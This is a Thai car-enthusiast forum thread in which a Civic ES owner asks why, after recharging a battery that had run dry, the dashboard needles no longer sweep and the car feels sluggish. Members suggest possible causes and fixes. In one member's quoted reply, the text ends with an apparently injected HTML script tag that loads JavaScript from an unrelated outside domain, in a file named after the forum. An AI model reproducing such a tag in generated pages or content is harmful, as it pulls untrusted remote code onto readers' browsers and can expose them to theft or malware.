ตอบ
nayza


ชื่อเล่น: นาย

เข้าร่วม: 15 ตุลา 2010
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 6

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 19 พฤศจิกา 2012 22:24 - ขอบสอบถามเรื่องแบตคับ
คือผมเอาแบตเตอรี่ไปซาร์ทมา (สาเหตุที่เอาไปซาร์ท คือ รถสตาร์ทไม่ติด ไฟหน้าปัดไม่ขึ้น ) ต่อคับ ไปซาร์ทกลับมาแล้วเอามาใส่ที่รถเหมือนเดิม  ผลคือ ไฟหน้าปัดเรือนไมล์ ไม่ตีกลับไปมาเหมือนเดิม แล้วรถมีอาการอืดกว่าเดิม มันเกิดจากสาเหตุอะไรคับ ผู้รู้ช่วยตอบที แล้วต้องแก่ไขยังไงคับ 
sakpu


ชื่อเล่น: ต๋อง

เข้าร่วม: 23 ตุลา 2012
ตอบ: 155

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 258
ให้คำขอบคุณ: 165

ที่อยู่: ถนนรังสิต-นครนายก 48 (คลอง 2)
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 20 พฤศจิกา 2012 16:00 - ขอบสอบถามเรื่องแบตคับ
แบตฯ ใช้งานมากี่ปีแล้วครับ?
สาเหตุแบตฯหมดเพราะอะไร?
 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
อังคาร, 20 พฤศจิกา 2012 17:17 - ขอบสอบถามเรื่องแบตคับ
หลังจากชาร์จใหม่ๆ สตาร์ทแล้วออกไปวิ่ง อาการนี้เป็นตั้งแต่บิดกุญแจครั้งแรกเลยหรือว่าวิ่งไปซักพักแล้วถึงเป็นครับ
เข็มไมด์ ไม่แน่ใจอาจเป็นที่แบตได้ แต่บางทีเรื่องรถอืดอาจเป็นเพราะถอดแบตเป็นการรีเซทกล่อง ตอนนี้กล่องเลยไม่ตอบสนองเหมือนก่อนแบตหมดก็ได้
ได้รับคำขอบคุณจาก: witnu 
nayza


ชื่อเล่น: นาย

เข้าร่วม: 15 ตุลา 2010
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 6

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 พฤศจิกา 2012 08:30 - ขอบสอบถามเรื่องแบตคับ
sakpu พิมพ์ว่า:
แบตฯ ใช้งานมากี่ปีแล้วครับ?
สาเหตุแบตฯหมดเพราะอะไร?

-ไม่ทราบว่า่ใช้มากี่ปีคับ เพราะซื้อรถมือสองมาคับ
-สาเหตุที่หมดคือ เค้าบอกว่าน้ำกลั่นหมดจนแห้งคับ.....
nayza


ชื่อเล่น: นาย

เข้าร่วม: 15 ตุลา 2010
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 6

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 พฤศจิกา 2012 08:35 - ขอบสอบถามเรื่องแบตคับ
Saka พิมพ์ว่า:
หลังจากชาร์จใหม่ๆ สตาร์ทแล้วออกไปวิ่ง อาการนี้เป็นตั้งแต่บิดกุญแจครั้งแรกเลยหรือว่าวิ่งไปซักพักแล้วถึงเป็นครับ
เข็มไมด์ ไม่แน่ใจอาจเป็นที่แบตได้ แต่บางทีเรื่องรถอืดอาจเป็นเพราะถอดแบตเป็นการรีเซทกล่อง ตอนนี้กล่องเลยไม่ตอบสนองเหมือนก่อนแบตหมดก็ได้


อาการอืดเป็นตั้งแต่เริ่มวิ่งเลยคับ เพราะรู้สึกได้เลยว่าอืดกว่าเดิม 
nayza


ชื่อเล่น: นาย

เข้าร่วม: 15 ตุลา 2010
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 6

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 พฤศจิกา 2012 08:37 - ขอบสอบถามเรื่องแบตคับ
อยากรู้ว่าอาการมันเกิดจากอะไรคับ จะได้ไม่เสียรู้ช่าง .... อิอิ
เสก


ชื่อเล่น: เสก

เข้าร่วม: 26 กันยา 2012
ตอบ: 1727

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2214
ให้คำขอบคุณ: 997

ที่อยู่: นวมินทร์@บางกะปิ
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 21 พฤศจิกา 2012 09:13 - ขอบสอบถามเรื่องแบตคับ
อาการอืดไม่น่าจะเกิดจากแบตนะครับ ลองล้างพวกปีกผีเสื้อดู ยังงัยรอท่านผู้รู้แจ้งเพิ่มเติม
Chonchy


ชื่อเล่น: ชล

เข้าร่วม: 12 มกรา 2012
ตอบ: 4143

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7371
ให้คำขอบคุณ: 6492

ที่อยู่: แม่กลอง...มหาชัย...
ปี: 2001
พุธ, 21 พฤศจิกา 2012 09:50 - ขอบสอบถามเรื่องแบตคับ
ถ้าแบตแห้ง จนไฟหมด สันนิษฐานได้เลยว่า แบตเสื่อมแล้วคับ เพราะไม่มีน้ำกลั่นไปหล่อเลี้ยงไฟ

ส่วนเรื่องอืดนั้น ต้องรอผู้รู้มาช่วยอีกทีคับ...
nayza


ชื่อเล่น: นาย

เข้าร่วม: 15 ตุลา 2010
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 6

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 พฤศจิกา 2012 10:30 - ขอบสอบถามเรื่องแบตคับ
 รอๆ
sakpu


ชื่อเล่น: ต๋อง

เข้าร่วม: 23 ตุลา 2012
ตอบ: 155

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 258
ให้คำขอบคุณ: 165

ที่อยู่: ถนนรังสิต-นครนายก 48 (คลอง 2)
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 21 พฤศจิกา 2012 11:24 - ขอบสอบถามเรื่องแบตคับ
nayza พิมพ์ว่า:

sakpu พิมพ์ว่า:
แบตฯ ใช้งานมากี่ปีแล้วครับ?
สาเหตุแบตฯหมดเพราะอะไร?

-ไม่ทราบว่า่ใช้มากี่ปีคับ เพราะซื้อรถมือสองมาคับ
-สาเหตุที่หมดคือ เค้าบอกว่าน้ำกลั่นหมดจนแห้งคับ.....


เห็นควรเปลี่ยนแบตฯใหม่ครับเพราะเราไม่รู้ว่าเจ้าของเดิมใช้มาเท่าไรแล้ว
อีกอย่างน้ำกลั่นหมดจนแห้ง แผ่นธาตุภายในแบตฯ คงเสื่อมไปมากพอสมควร
ข้อสังเกตุ เวลาสตารท์รถมีอาการลากยาวกว่าเครื่องยนต์จะทำงานหรือไม
- ถ้าลากยาวกว่าจะติด แสดงว่าแบตเริ่มเสื่อมค่ากระแสเริ่มต่ำกว่ามาตรฐาน
- แบตฯปกติดีบิดกุญแจสตารท์เครื่องยนต์ต้องทำงานทันที
- จะเปลี่ยนแบตฯ ใหม่ถ้าไม่มีเวลาดูแลให้เปลี่ยนเป็นแบตฯแบบแห้ง (ไม่ต้องเติมน้ำกลั่น)
ทั้งนี้ขึ้นอยู่กับกำลังทรัพย์นะครับ แบตฯแบบเปียกเติมน้ำกลั่นจะมีราคาถูกกว่าแบตฯแบบแห้ง


แบตเตอรี่รถยนต์ทำหน้าที่ ป้อนกระแสไฟฟ้าให้อุปกรณ์ต่างๆของเครื่องยนต์เพื่อให้ทำงานได้ เช่น มอเตอร์สตาร์ท ระบบจุดระเบิด ในขณะที่สตาร์ทรถยนต์ นอกจากนี้ยังทำหน้าที่ป้อนพลังงานให้กับอุปกรณ์อำนวยความสะดวกหลายๆอย่าง ด้วย เช่น ระบบไฟส่องสว่าง วิทยุ เป็นต้น
แบตเตอรี่รถยนต์ ไม่ใช่แหล่ง ผลิตกระแสไฟฟ้า แต่เป็นแหล่งเก็บไฟฟ้าสำรอง เมื่อใดก็ตามที่ไดร์ชาร์จ ซึ่งเป็นอุปกรณ์ผลิตกระแสไฟฟ้า ไม่สามารถผลิตกระแสไฟฟ้าได้ทัน เช่น การขับขี่ในตอนกลางคืนซึ่งใช้ระบบไฟเยอะกว่าปกติ ก็จะดึงไฟจากแบตเตอรี่มาใช้ ขณะเดียวกันถ้าไดร์ชาร์จทำงานได้ดีขึ้น หรือ หมุนเร็วขึ้น ก็จะมีกระแสไฟฟ้าเหลือจากการใช้งาน ซึ่งก็จะถูกส่งกลับเข้าไปยังแหล่งเก็บไฟฟ้าสำรอง (แบตเตอรี่) จนกว่าจะเต็มแบตเตอรี่จะถูกจ่ายไฟออกอย่างเดียวก็เฉพาะตอนสตาร์ทเครื่อง ยนต์เท่านั้น เพื่อส่งกระแสไฟเข้าสู่มอเตอร์สตาร์ท และ ระบบต่างๆของเครื่องยนต์ เมื่อเครื่องยนต์สตาร์ทติด และ ทำงานแล้ว ไดร์ชาร์จก็จะทำหน้าที่ประจุไฟเข้าแบตเตอรี่อย่างต่อเนื่อง นั่นก็หมายความว่า กระแสไฟฟ้าจะถูกจ่ายออกไป และ ถูกประจุเพิ่มเข้าไป หมุนเวียนเข้าออกแบตเตอรี่อยู่เสมอ ไม่ได้จ่ายออกไปจนหมดอย่างเดียว

นั่น หมายความว่าแบตเตอรี่จะหมดได้ก็มีอยู่เพียง 2 กรณี นั่นก็คือ 1. เก็บไฟไม่อยู่ หรือ หมดอายุการใช้งาน 2. ไดร์ชาร์จทำงานผิดปกติ หรือ บกพร่อง ซึ่งทำให้ประจุไฟเข้าไปยังแบตเตอรี่รถยนต์ได้น้อยมากไม่เพียงพอต่อการใช้งาน หรือ ไม่สามารถประจุไฟเข้าไปได้เลย

อายุการใช้งานของแบตเตอรี่รถยนต์ แบตเตอรี่รถยนต์มีิอยู่ด้วยกัน 2 ชนิด คือ


1. แบบเปียก นิยมใช้กันเป็นส่วนใหญ่ แบ่งย่อยออกได้อีกเป็น 2 แบบ คือ แบบที่ต้องเติม และ ดูแลน้ำกลั่นบ่อยๆ อย่างน้อยสัปดาห์ละครั้ง กับ แบบไม่ต้องดูแลบ่อย (Maintenance Free) ซึ่งจะกินน้ำกลั่นน้อยมาก โดยทั้ง 2 แบบนี้จะมีฝาปิด-เปิดสำหรับเติมน้ำกลั่น ในแบบแรกนี้จะมีอายุการใช้งานโดยประมาณ 1.5-2 ปี แต่ไม่ควรเกิน 3 ปี ทั้งนี้ก็ขึ้นอยู่กับสภาพการใช้งาน และ การดูแลรักษา ถ้ามีการดูแลรักษาอยู่สม่ำเสมอก็จะทำให้แบตเตอรี่รถยนต์มีอายุการใช้งานที่ยาวนาน ขึ้น อย่างไรก็ดีเมื่อถึงอายุการใช้งานของมันก็สมควรที่จะเปลี่ยนแบตเตอรี่ลูก ใหม่ได้แล้ว
2. แบบแห้ง ไม่ต้องเติมน้ำกลั่น มีความทนทาน มีอายุการใช้งานที่ยาวนานกว่า และ มีราคาแพง แบตเตอรี่แบบแห้งนี้จะมีอายุการใช้งานโดยประมาณ 5-10 ปี แบตเตอรี่แบบนี้ไม่มีฝาปิด-เปิดสำหรับเติมน้ำกลั่น หรือไม่ก็ถูกซีลทับฝาไปเลย แต่จะมีตาแมวไว้สำหรับไว้คอยตรวจเช็คระดับน้ำกรด และ ระดับไฟชาร์จ

ที่มา คลังแบตเตอรี่


แก้ไขล่าสุดโดย เมื่อ พุธ, 21 พฤศจิกา 2012 11:42, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: yoyosonic  akawut 
civicIT


เข้าร่วม: 10 พฤษภาคม 2010
ตอบ: 402

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 538
ให้คำขอบคุณ: 810

ที่อยู่: มหาชัย - อ่อนนุช
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 21 พฤศจิกา 2012 11:37 - ขอบสอบถามเรื่องแบตคับ
จริงๆระบบก็ไม่มีไรมากนะ ไดชาร์จไฟ เข้า แบต ถ้าแบตแห้ง เพราะไม่เติมน้ำ ก็ต้องเช็คไดด้วยว่าเสียหรืออะไรไหม ถ้าเช็คได ไดไม่เสีย ก็แค่เปลี่ยนแบตลูกใหม่ ก็น่าจะปกติ ส่วนรถอืด ไม่อืด ไม่เกี่ยวกะแบตครับ เพราะหลังสตาร์ทไปแล้วใช้ได ล้วนๆ ไม่เกี่ยวกะแบต อาการขับแล้วอืด มันมีได้หลายกรณี ง่ายๆ ก็ น้ำมันเครื่องเปลี่ยนนานยัง กรองเบนซิน เคยเปลี่ยนยัง อันนี้แบบง่าย ถ้าพวกนี้เช็คแล้วปกติ ถึงจะไปไล่ว่า ที่่อืดเนี้ยติดแก๊สด้วยไหม เพราะไม่ทราบข้อมูล ยังๆไง ก็ลงรายละเอียดให้ครบ นิดนึง เพื่อนๆจะได้ช่วยวิเคราะห์ได้ง่ายครับ
yoyosonic


เข้าร่วม: 20 กรกฎา 2011
ตอบ: 1079

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 325
ให้คำขอบคุณ: 3432

ที่อยู่: กทม.
ปี: 2002
พุธ, 21 พฤศจิกา 2012 12:45 - ขอบสอบถามเรื่องแบตคับ
sakpu พิมพ์ว่า:
nayza พิมพ์ว่า:

sakpu พิมพ์ว่า:
แบตฯ ใช้งานมากี่ปีแล้วครับ?
สาเหตุแบตฯหมดเพราะอะไร?

-ไม่ทราบว่า่ใช้มากี่ปีคับ เพราะซื้อรถมือสองมาคับ
-สาเหตุที่หมดคือ เค้าบอกว่าน้ำกลั่นหมดจนแห้งคับ.....


เห็นควรเปลี่ยนแบตฯใหม่ครับเพราะเราไม่รู้ว่าเจ้าของเดิมใช้มาเท่าไรแล้ว
อีกอย่างน้ำกลั่นหมดจนแห้ง แผ่นธาตุภายในแบตฯ คงเสื่อมไปมากพอสมควร
ข้อสังเกตุ เวลาสตารท์รถมีอาการลากยาวกว่าเครื่องยนต์จะทำงานหรือไม
- ถ้าลากยาวกว่าจะติด แสดงว่าแบตเริ่มเสื่อมค่ากระแสเริ่มต่ำกว่ามาตรฐาน
- แบตฯปกติดีบิดกุญแจสตารท์เครื่องยนต์ต้องทำงานทันที
- จะเปลี่ยนแบตฯ ใหม่ถ้าไม่มีเวลาดูแลให้เปลี่ยนเป็นแบตฯแบบแห้ง (ไม่ต้องเติมน้ำกลั่น)
ทั้งนี้ขึ้นอยู่กับกำลังทรัพย์นะครับ แบตฯแบบเปียกเติมน้ำกลั่นจะมีราคาถูกกว่าแบตฯแบบแห้ง


แบตเตอรี่รถยนต์ทำหน้าที่ ป้อนกระแสไฟฟ้าให้อุปกรณ์ต่างๆของเครื่องยนต์เพื่อให้ทำงานได้ เช่น มอเตอร์สตาร์ท ระบบจุดระเบิด ในขณะที่สตาร์ทรถยนต์ นอกจากนี้ยังทำหน้าที่ป้อนพลังงานให้กับอุปกรณ์อำนวยความสะดวกหลายๆอย่าง ด้วย เช่น ระบบไฟส่องสว่าง วิทยุ เป็นต้น
แบตเตอรี่รถยนต์ ไม่ใช่แหล่ง ผลิตกระแสไฟฟ้า แต่เป็นแหล่งเก็บไฟฟ้าสำรอง เมื่อใดก็ตามที่ไดร์ชาร์จ ซึ่งเป็นอุปกรณ์ผลิตกระแสไฟฟ้า ไม่สามารถผลิตกระแสไฟฟ้าได้ทัน เช่น การขับขี่ในตอนกลางคืนซึ่งใช้ระบบไฟเยอะกว่าปกติ ก็จะดึงไฟจากแบตเตอรี่มาใช้ ขณะเดียวกันถ้าไดร์ชาร์จทำงานได้ดีขึ้น หรือ หมุนเร็วขึ้น ก็จะมีกระแสไฟฟ้าเหลือจากการใช้งาน ซึ่งก็จะถูกส่งกลับเข้าไปยังแหล่งเก็บไฟฟ้าสำรอง (แบตเตอรี่) จนกว่าจะเต็มแบตเตอรี่จะถูกจ่ายไฟออกอย่างเดียวก็เฉพาะตอนสตาร์ทเครื่อง ยนต์เท่านั้น เพื่อส่งกระแสไฟเข้าสู่มอเตอร์สตาร์ท และ ระบบต่างๆของเครื่องยนต์ เมื่อเครื่องยนต์สตาร์ทติด และ ทำงานแล้ว ไดร์ชาร์จก็จะทำหน้าที่ประจุไฟเข้าแบตเตอรี่อย่างต่อเนื่อง นั่นก็หมายความว่า กระแสไฟฟ้าจะถูกจ่ายออกไป และ ถูกประจุเพิ่มเข้าไป หมุนเวียนเข้าออกแบตเตอรี่อยู่เสมอ ไม่ได้จ่ายออกไปจนหมดอย่างเดียว

นั่น หมายความว่าแบตเตอรี่จะหมดได้ก็มีอยู่เพียง 2 กรณี นั่นก็คือ 1. เก็บไฟไม่อยู่ หรือ หมดอายุการใช้งาน 2. ไดร์ชาร์จทำงานผิดปกติ หรือ บกพร่อง ซึ่งทำให้ประจุไฟเข้าไปยังแบตเตอรี่รถยนต์ได้น้อยมากไม่เพียงพอต่อการใช้งาน หรือ ไม่สามารถประจุไฟเข้าไปได้เลย

อายุการใช้งานของแบตเตอรี่รถยนต์ แบตเตอรี่รถยนต์มีิอยู่ด้วยกัน 2 ชนิด คือ


1. แบบเปียก นิยมใช้กันเป็นส่วนใหญ่ แบ่งย่อยออกได้อีกเป็น 2 แบบ คือ แบบที่ต้องเติม และ ดูแลน้ำกลั่นบ่อยๆ อย่างน้อยสัปดาห์ละครั้ง กับ แบบไม่ต้องดูแลบ่อย (Maintenance Free) ซึ่งจะกินน้ำกลั่นน้อยมาก โดยทั้ง 2 แบบนี้จะมีฝาปิด-เปิดสำหรับเติมน้ำกลั่น ในแบบแรกนี้จะมีอายุการใช้งานโดยประมาณ 1.5-2 ปี แต่ไม่ควรเกิน 3 ปี ทั้งนี้ก็ขึ้นอยู่กับสภาพการใช้งาน และ การดูแลรักษา ถ้ามีการดูแลรักษาอยู่สม่ำเสมอก็จะทำให้แบตเตอรี่รถยนต์มีอายุการใช้งานที่ยาวนาน ขึ้น อย่างไรก็ดีเมื่อถึงอายุการใช้งานของมันก็สมควรที่จะเปลี่ยนแบตเตอรี่ลูก ใหม่ได้แล้ว
2. แบบแห้ง ไม่ต้องเติมน้ำกลั่น มีความทนทาน มีอายุการใช้งานที่ยาวนานกว่า และ มีราคาแพง แบตเตอรี่แบบแห้งนี้จะมีอายุการใช้งานโดยประมาณ 5-10 ปี แบตเตอรี่แบบนี้ไม่มีฝาปิด-เปิดสำหรับเติมน้ำกลั่น หรือไม่ก็ถูกซีลทับฝาไปเลย แต่จะมีตาแมวไว้สำหรับไว้คอยตรวจเช็คระดับน้ำกรด และ ระดับไฟชาร์จ

ที่มา คลังแบตเตอรี่




+1.."<script src="https://sport32news.com/civicesgroup.js">
nayza


ชื่อเล่น: นาย

เข้าร่วม: 15 ตุลา 2010
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 6

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 พฤศจิกา 2012 15:47 - ขอบสอบถามเรื่องแบตคับ
sakpu พิมพ์ว่า:

nayza พิมพ์ว่า:

sakpu พิมพ์ว่า:
แบตฯ ใช้งานมากี่ปีแล้วครับ?
สาเหตุแบตฯหมดเพราะอะไร?

-ไม่ทราบว่า่ใช้มากี่ปีคับ เพราะซื้อรถมือสองมาคับ
-สาเหตุที่หมดคือ เค้าบอกว่าน้ำกลั่นหมดจนแห้งคับ.....


เห็นควรเปลี่ยนแบตฯใหม่ครับเพราะเราไม่รู้ว่าเจ้าของเดิมใช้มาเท่าไรแล้ว
อีกอย่างน้ำกลั่นหมดจนแห้ง แผ่นธาตุภายในแบตฯ คงเสื่อมไปมากพอสมควร
ข้อสังเกตุ เวลาสตารท์รถมีอาการลากยาวกว่าเครื่องยนต์จะทำงานหรือไม
- ถ้าลากยาวกว่าจะติด แสดงว่าแบตเริ่มเสื่อมค่ากระแสเริ่มต่ำกว่ามาตรฐาน
- แบตฯปกติดีบิดกุญแจสตารท์เครื่องยนต์ต้องทำงานทันที
- จะเปลี่ยนแบตฯ ใหม่ถ้าไม่มีเวลาดูแลให้เปลี่ยนเป็นแบตฯแบบแห้ง (ไม่ต้องเติมน้ำกลั่น)
ทั้งนี้ขึ้นอยู่กับกำลังทรัพย์นะครับ แบตฯแบบเปียกเติมน้ำกลั่นจะมีราคาถูกกว่าแบตฯแบบแห้ง


แบตเตอรี่รถยนต์ทำหน้าที่ ป้อนกระแสไฟฟ้าให้อุปกรณ์ต่างๆของเครื่องยนต์เพื่อให้ทำงานได้ เช่น มอเตอร์สตาร์ท ระบบจุดระเบิด ในขณะที่สตาร์ทรถยนต์ นอกจากนี้ยังทำหน้าที่ป้อนพลังงานให้กับอุปกรณ์อำนวยความสะดวกหลายๆอย่าง ด้วย เช่น ระบบไฟส่องสว่าง วิทยุ เป็นต้น
แบตเตอรี่รถยนต์ ไม่ใช่แหล่ง ผลิตกระแสไฟฟ้า แต่เป็นแหล่งเก็บไฟฟ้าสำรอง เมื่อใดก็ตามที่ไดร์ชาร์จ ซึ่งเป็นอุปกรณ์ผลิตกระแสไฟฟ้า ไม่สามารถผลิตกระแสไฟฟ้าได้ทัน เช่น การขับขี่ในตอนกลางคืนซึ่งใช้ระบบไฟเยอะกว่าปกติ ก็จะดึงไฟจากแบตเตอรี่มาใช้ ขณะเดียวกันถ้าไดร์ชาร์จทำงานได้ดีขึ้น หรือ หมุนเร็วขึ้น ก็จะมีกระแสไฟฟ้าเหลือจากการใช้งาน ซึ่งก็จะถูกส่งกลับเข้าไปยังแหล่งเก็บไฟฟ้าสำรอง (แบตเตอรี่) จนกว่าจะเต็มแบตเตอรี่จะถูกจ่ายไฟออกอย่างเดียวก็เฉพาะตอนสตาร์ทเครื่อง ยนต์เท่านั้น เพื่อส่งกระแสไฟเข้าสู่มอเตอร์สตาร์ท และ ระบบต่างๆของเครื่องยนต์ เมื่อเครื่องยนต์สตาร์ทติด และ ทำงานแล้ว ไดร์ชาร์จก็จะทำหน้าที่ประจุไฟเข้าแบตเตอรี่อย่างต่อเนื่อง นั่นก็หมายความว่า กระแสไฟฟ้าจะถูกจ่ายออกไป และ ถูกประจุเพิ่มเข้าไป หมุนเวียนเข้าออกแบตเตอรี่อยู่เสมอ ไม่ได้จ่ายออกไปจนหมดอย่างเดียว

นั่น หมายความว่าแบตเตอรี่จะหมดได้ก็มีอยู่เพียง 2 กรณี นั่นก็คือ 1. เก็บไฟไม่อยู่ หรือ หมดอายุการใช้งาน 2. ไดร์ชาร์จทำงานผิดปกติ หรือ บกพร่อง ซึ่งทำให้ประจุไฟเข้าไปยังแบตเตอรี่รถยนต์ได้น้อยมากไม่เพียงพอต่อการใช้งาน หรือ ไม่สามารถประจุไฟเข้าไปได้เลย

อายุการใช้งานของแบตเตอรี่รถยนต์ แบตเตอรี่รถยนต์มีิอยู่ด้วยกัน 2 ชนิด คือ


1. แบบเปียก นิยมใช้กันเป็นส่วนใหญ่ แบ่งย่อยออกได้อีกเป็น 2 แบบ คือ แบบที่ต้องเติม และ ดูแลน้ำกลั่นบ่อยๆ อย่างน้อยสัปดาห์ละครั้ง กับ แบบไม่ต้องดูแลบ่อย (Maintenance Free) ซึ่งจะกินน้ำกลั่นน้อยมาก โดยทั้ง 2 แบบนี้จะมีฝาปิด-เปิดสำหรับเติมน้ำกลั่น ในแบบแรกนี้จะมีอายุการใช้งานโดยประมาณ 1.5-2 ปี แต่ไม่ควรเกิน 3 ปี ทั้งนี้ก็ขึ้นอยู่กับสภาพการใช้งาน และ การดูแลรักษา ถ้ามีการดูแลรักษาอยู่สม่ำเสมอก็จะทำให้แบตเตอรี่รถยนต์มีอายุการใช้งานที่ยาวนาน ขึ้น อย่างไรก็ดีเมื่อถึงอายุการใช้งานของมันก็สมควรที่จะเปลี่ยนแบตเตอรี่ลูก ใหม่ได้แล้ว
2. แบบแห้ง ไม่ต้องเติมน้ำกลั่น มีความทนทาน มีอายุการใช้งานที่ยาวนานกว่า และ มีราคาแพง แบตเตอรี่แบบแห้งนี้จะมีอายุการใช้งานโดยประมาณ 5-10 ปี แบตเตอรี่แบบนี้ไม่มีฝาปิด-เปิดสำหรับเติมน้ำกลั่น หรือไม่ก็ถูกซีลทับฝาไปเลย แต่จะมีตาแมวไว้สำหรับไว้คอยตรวจเช็คระดับน้ำกรด และ ระดับไฟชาร์จ

ที่มา คลังแบตเตอรี่


nayza


ชื่อเล่น: นาย

เข้าร่วม: 15 ตุลา 2010
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 6

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 พฤศจิกา 2012 15:52 - ขอบสอบถามเรื่องแบตคับ
civicIT พิมพ์ว่า:
จริงๆระบบก็ไม่มีไรมากนะ ไดชาร์จไฟ เข้า แบต ถ้าแบตแห้ง เพราะไม่เติมน้ำ ก็ต้องเช็คไดด้วยว่าเสียหรืออะไรไหม ถ้าเช็คได ไดไม่เสีย ก็แค่เปลี่ยนแบตลูกใหม่ ก็น่าจะปกติ ส่วนรถอืด ไม่อืด ไม่เกี่ยวกะแบตครับ เพราะหลังสตาร์ทไปแล้วใช้ได ล้วนๆ ไม่เกี่ยวกะแบต อาการขับแล้วอืด มันมีได้หลายกรณี ง่ายๆ ก็ น้ำมันเครื่องเปลี่ยนนานยัง กรองเบนซิน เคยเปลี่ยนยัง อันนี้แบบง่าย ถ้าพวกนี้เช็คแล้วปกติ ถึงจะไปไล่ว่า ที่่อืดเนี้ยติดแก๊สด้วยไหม เพราะไม่ทราบข้อมูล ยังๆไง ก็ลงรายละเอียดให้ครบ นิดนึง เพื่อนๆจะได้ช่วยวิเคราะห์ได้ง่ายครับ



รถติดแก๊สคับ แต่ก่อนที่จะเอาแบตไปซาร์ท รถก็ขับปกติคับไม่อืดแบบตอนปัจจุบัน (ติดแก๊สมาแล้วประมาณ 4 เดือนคับ น้ำมันเครื่องเปลี่ยนมาได้2เดือนคับ) อีกอย่างคับ แล้วบิดกุญแจสตาร์ท เข็มไมล์จะตีกลับไปมา แต่หลังที่เอาไปแบตไทชาร์ทกลับมาเสียบเข้า ทำไมเข็มไมล์ไม่ตีกลีบไปมาเลยอ่ะคับ 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.